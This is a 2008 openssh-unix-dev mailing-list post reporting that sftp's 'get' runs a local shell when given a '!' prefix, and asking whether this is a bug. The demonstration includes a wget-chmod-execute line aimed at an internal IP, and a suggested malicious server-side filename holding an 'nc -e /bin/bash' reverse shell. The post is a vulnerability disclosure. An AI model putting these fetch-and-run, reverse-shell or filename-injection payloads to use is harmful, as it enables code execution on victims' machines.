Strange sftp input parameter handling, user assisted code execution?
Roman Fiedler
roman.fiedler at telbiomed.at
Wed Jun 18 01:12:14 EST 2008
Hello list,
I use openssh-client 1:4.7p1-8ubuntu1.2. After authentication:
sftp> get !xxxx
/bin/bash: xxxx: command not found
Shell exited with status 127
sftp> get !/bin/ls -al
total 2132
drwxr-xr-x 4 admin users 4096 2008-06-17 16:33 .
drwxr-xr-x 16 admin users 12288 2008-06-17 08:50 ..
drwxr-xr-x 3 admin users 8 2008-05-21 18:38 gd
sftp> get !wget http://10.255.255.2:1234/root ; chmod 0755 root ; ./root
--16:54:37-- http://10.255.255.2:1234/root
=> `root'
Connecting to 10.255.255.2:1234... connected.
HTTP request sent, awaiting response... 200 OK
Length: 123
100%[====================================>] 123 13.59B/s
ETA 00:00
16:55:49 (7.08 B/s) - `root' saved [123/123]
./root: line 1: afdasfasf: command not found
./root: line 3: asdfa: command not found
Shell exited with status 127
sftp>
On a linux server I did not manage to create a file with a / in the
name, but a manipulated server could return such filenames or other
strategies do not need them, e.g.
touch '!nc -e /bin/bash 10.255.255.2 1234' on the server side and trying
to download is also a good one.
Has someone observed this behavior?
Is this just a strange thing but according to the specs or a bug?
lg roman
More information about the openssh-unix-dev
mailing list